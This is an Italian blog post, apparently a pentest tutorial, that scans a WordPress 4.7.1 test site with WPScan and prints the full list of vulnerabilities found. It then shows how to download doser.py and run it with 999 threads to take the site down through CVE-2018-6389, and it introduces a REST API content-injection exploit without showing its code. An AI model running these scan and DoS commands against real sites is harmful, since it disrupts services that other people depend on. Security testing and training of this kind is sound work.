{"id":1813,"date":"2019-05-27T15:30:06","date_gmt":"2019-05-27T13:30:06","guid":{"rendered":"https:\/\/christeninformatica.ch\/?p=1813"},"modified":"2023-05-09T06:42:52","modified_gmt":"2023-05-09T04:42:52","slug":"guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit","status":"publish","type":"post","link":"https:\/\/christeninformatica.ch\/it\/guida-sicurezza-hacking-wordpress-content-injection-exploit-dos-wpscan-metasploit\/","title":{"rendered":"Hacking WordPress – Content Injection Exploit e DoS"},"content":{"rendered":"

In questo esempio si andranno ad “exploitare<\/b>” alcune vulnerabilit\u00e0<\/b> della versione 4.7.1 di WordPress<\/b>. Per prima cosa scansionare il sito alla ricerca di vulnerabilit\u00e0<\/b> con WPScan<\/b>.<\/p>\n

Rilevare vulnerabilit\u00e0 in WordPress con WPScan<\/h2>\n
\n
\n
workstation:\/home\/chit # wpscan --url http:\/\/chit-test.ch\nWARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.7\n_______________________________________________________________\n        __          _______   _____\n        \\ \\        \/ \/  __ \\ \/ ____|\n         \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n          \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n           \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n            \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n        WordPress Security Scanner by the WPScan Team\n                       Version 3.4.3\n          Sponsored by Sucuri - https:\/\/sucuri.net\n      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/chit-test.ch\/\n[+] Started: Wed May 22 18:07:18 2019\n\nInteresting Finding(s):\n\n[+] http:\/\/chit-test.ch\/\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] WordPress version 4.7.1 identified (Insecure, released on 2017-01-11).\n | Detected By: Rss Generator (Passive Detection)\n |  - http:\/\/chit-test.ch\/?feed=rss2, https:\/\/wordpress.org\/?v=4.7.1\n |  - http:\/\/chit-test.ch\/?feed=comments-rss2, https:\/\/wordpress.org\/?v=4.7.1\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8729\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5610\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/21264a31e0849e6ff793a06a17de877dd88ea454\n |\n | [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8730\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5611\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/85384297a60900004e27e417eac56d24267054cb\n |\n | [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8731\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-5612\n |      - https:\/\/wordpress.org\/news\/2017\/01\/wordpress-4-7-2-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4482f9207027de8f36630737ae085110896ea849\n |\n | [!] Title: WordPress 4.7.0-4.7.1 - Unauthenticated Page\/Post Content Modification via REST API\n |     Fixed in: 4.7.2\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8734\n |      - https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html\n |      - https:\/\/blogs.akamai.com\/2017\/02\/wordpress-web-api-vulnerability.html\n |      - https:\/\/gist.github.com\/leonjza\/2244eb15510a0687ed93160c623762ab\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e357195ce303017d517aff944644a7a1232926f7\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_content_injection\n |\n | [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8765\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6814\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/563\n |\n | [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8766\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6815\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/288cd469396cfe7055972b457eb589cea51ce40e\n |\n | [!] Title: WordPress 4.7.0-4.7.2 - Authenticated Unintended File Deletion in Plugin Delete\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8767\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6816\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/4d80f8b3e1b00a3edcee0774dc9c2f4c78f9e663\n |\n | [!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8768\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6817\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8\n |      - https:\/\/blog.sucuri.net\/2017\/03\/stored-xss-in-wordpress-core.html\n |\n | [!] Title: WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8769\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6818\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9092fd01e1f452f37c313d38b18f9fe6907541f9\n |\n | [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS\n |     Fixed in: 4.7.3\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8770\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-6819\n |      - https:\/\/wordpress.org\/news\/2017\/03\/wordpress-4-7-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/263831a72d08556bc2f3a328673d95301a152829\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html\n |      - http:\/\/seclists.org\/oss-sec\/2017\/q1\/562\n |      - https:\/\/hackerone.com\/reports\/153093\n |\n | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8807\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-8295\n |      - https:\/\/exploitbox.io\/vuln\/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html\n |      - http:\/\/blog.dewhurstsecurity.com\/2017\/05\/04\/exploitbox-wordpress-security-advisories.html\n |      - https:\/\/core.trac.wordpress.org\/ticket\/25239\n |\n | [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8815\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9066\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/76d77e927bb4d0f87c7262a50e28d84e01fd2b11\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8816\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9062\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d95e3ae816f4d7c638f40d3e936a4be19724381\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks \n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8817\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9065\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/e88a48a066ab2200ce3091b131d43e2fab2460a4\n |\n | [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8818\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9064\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/38347d7c580be4cdd8476e4bbc653d5c79ed9b67\n |      - https:\/\/sumofpwn.nl\/advisory\/2016\/cross_site_request_forgery_in_wordpress_connection_information.html\n |\n | [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8819\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9061\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6\n |      - https:\/\/hackerone.com\/reports\/203515\n |      - https:\/\/hackerone.com\/reports\/203515\n |\n | [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8820\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-9063\n |      - https:\/\/wordpress.org\/news\/2017\/05\/wordpress-4-7-5\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3d10fef22d788f29aed745b0f5ff6f6baea69af3\n |\n | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fc930d3daed1c3acef010d04acc2c5de93cd18ec\n |\n | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection\n |     Fixed in: 4.7.5\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8906\n |      - https:\/\/medium.com\/websec\/wordpress-sqli-bbb2afcc8e94\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/70b21279098fc973eae803693c0705a548128e48\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8905\n |\n | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8910\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14725\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41398\n |\n | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8911\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14719\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41457\n |\n | [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer \n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8912\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14722\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41397\n |\n | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8913\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14724\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41448\n |\n | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor\n |     Fixed in: 4.7.6\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8914\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-14726\n |      - https:\/\/wordpress.org\/news\/2017\/09\/wordpress-4-8-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/41395\n |      - https:\/\/blog.sucuri.net\/2017\/09\/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html\n |\n | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness\n |     Fixed in: 4.7.7\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8941\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-16510\n |      - https:\/\/wordpress.org\/news\/2017\/10\/wordpress-4-8-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/a2693fd8602e3263b5925b9d799ddd577202167d\n |      - https:\/\/twitter.com\/ircmaxell\/status\/923662170092638208\n |      - https:\/\/blog.ircmaxell.com\/2017\/10\/disclosure-wordpress-wpdb-sql-injection-technical.html\n |\n | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8966\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17092\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/67d03a98c2cae5f41843c897f206adde299b0509\n |\n | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8967\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17094\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f1de7e42df29395c3314bf85bff3d1f4f90541de\n |\n | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8968\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17093\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3713ac5ebc90fb2011e98dfd691420f43da6c09a\n |\n | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing\n |     Fixed in: 4.7.8\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/8969\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17091\n |      - https:\/\/wordpress.org\/news\/2017\/11\/wordpress-4-9-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/eaf1cfdc1fe0bdffabd8d879c591b864d833326c\n |\n | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.9\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9006\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-5776\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/3fe9cb61ee71fcfadb5e002399296fcc1198d850\n |      - https:\/\/wordpress.org\/news\/2018\/01\/wordpress-4-9-2-security-and-maintenance-release\/\n |      - https:\/\/core.trac.wordpress.org\/ticket\/42720\n |\n | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n |\n | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9053\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10101\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/804363859602d4050d9a38a21f5a65d9aec18216\n |\n | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9054\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10100\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/14bc2c0a6fde0da04b47130707e01df850eedc7e\n |\n | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag\n |     Fixed in: 4.7.10\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9055\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-10102\n |      - https:\/\/wordpress.org\/news\/2018\/04\/wordpress-4-9-5-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/31a4369366d6b8ce30045d4c838de2412c77850d\n |\n | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion\n |     Fixed in: 4.7.11\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9100\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-12895\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-file-delete-to-code-execution\/\n |      - http:\/\/blog.vulnspy.com\/2018\/06\/27\/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/c9dce0606b0d7e6f494d4abe7b193ac046a322cd\n |      - https:\/\/wordpress.org\/news\/2018\/07\/wordpress-4-9-7-security-and-maintenance-release\/\n |      - https:\/\/www.wordfence.com\/blog\/2018\/07\/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated File Delete\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9169\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20147\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9170\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20152\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-post-type-privilege-escalation\/\n |\n | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9171\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20148\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9172\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20153\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9173\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20150\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460\n |\n | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9174\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20151\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers\n |     Fixed in: 4.7.12\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9175\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20149\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/246a70bdbfac3bd45ff71c7941deef1bb206b19a\n |\n | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution\n |     Fixed in: 5.0.1\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9222\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8942\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-image-remote-code-execution\/\n |\n | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)\n |     Fixed in: 4.7.13\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9230\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-9787\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/0292de60ec78c5a44956765189403654fe4d080b\n |      - https:\/\/wordpress.org\/news\/2019\/03\/wordpress-5-1-1-security-and-maintenance-release\/\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-csrf-to-rce\/\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2019-05-07T00:00:00.000Z\n | Readme: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Detected By: Css Style (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Detected By: Style (Passive Detection)\n |  - http:\/\/chit-test.ch\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.7.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups\n Checking Config Backups - Time: 00:00:00 <====================================================> (21 \/ 21) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[+] Finished: Wed May 22 18:07:21 2019\n[+] Requests Done: 70\n[+] Cached Requests: 4\n[+] Data Sent: 10.706 KB\n[+] Data Received: 23.486 MB\n[+] Memory used: 72.094 MB\n[+] Elapsed time: 00:00:02\nworkstation:\/home\/chit #\n\n<\/pre>\n<\/blockquote>\n<\/div>\n
Come si pu\u00f2 vedere dal risultato WPScan<\/b> ha rilevato 44 vulnerabilit\u00e0<\/b>.<\/p>\n
WordPress Application Denial of Service (DoS)<\/h2>\n
Diamo ora un occhiata a una vulnerabilit\u00e0<\/b> trovata da WPScan<\/b>, un attacco DoS<\/b> contro l’applicazione (WordPress<\/b>).<\/p>\n
\n
\n
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)\n |     References:\n |      - https:\/\/wpvulndb.com\/vulnerabilities\/9021\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-6389\n |      - https:\/\/baraktawily.blogspot.fr\/2018\/02\/how-to-dos-29-of-world-wide-websites.html\n |      - https:\/\/github.com\/quitten\/doser.py\n |      - https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html\n<\/pre>\n<\/blockquote>\n<\/div>\n
Con questo tipo di attacco DoS<\/b> basterebbe un singolo “attacker” per rendere irraggiungibile il sito cosa che normalmente si ottiene con un attacco DDoS<\/b> in cui l’attacco proviene da diversi host alla volta.<\/p>\n
Come si pu\u00f2 vedere WPScan<\/b> fornisce sempre link molto utili sulle vulnerabilit\u00e0<\/b> trovate.<\/p>\n
Per pi\u00f9 informazioni riguardo a questa vulnerabilit\u00e0<\/b> dare un occhiata al seguente link fornito da WPScan<\/b>: https:\/\/thehackernews.com\/2018\/02\/wordpress-dos-exploit.html<\/a>.<\/p>\n
Per testare questo tipo di attacco scaricare il programma doser.py dal seguente link che troviamo tra le informazioni fornite da WPScan<\/b>: https:\/\/github.com\/quitten\/doser.py<\/a>.<\/p>\n
Una volta scaricato il programma eseguirlo come segue:<\/p>\n
\n
\n
user@workstation:~\/Programmi\/doser.py-master> python doser.py -t 999 -g http:\/\/chit-test.ch\n<\/pre>\n<\/blockquote>\n<\/div>\n
\"WordPress<\/p>\n
Unauthenticated Page\/Post Content Modification via REST API<\/h2>\n
Con questo exploit<\/b> \u00e8 possibile modificare il contenuto (content injection<\/b>) degli articoli del Blog WordPress<\/b> preso di mira.<\/p>\n
Per pi\u00f9 informazioni visitare anche: https:\/\/blog.sucuri.net\/2017\/02\/content-injection-vulnerability-wordpress-rest-api.html<\/a>.<\/p>\n
\n
\n
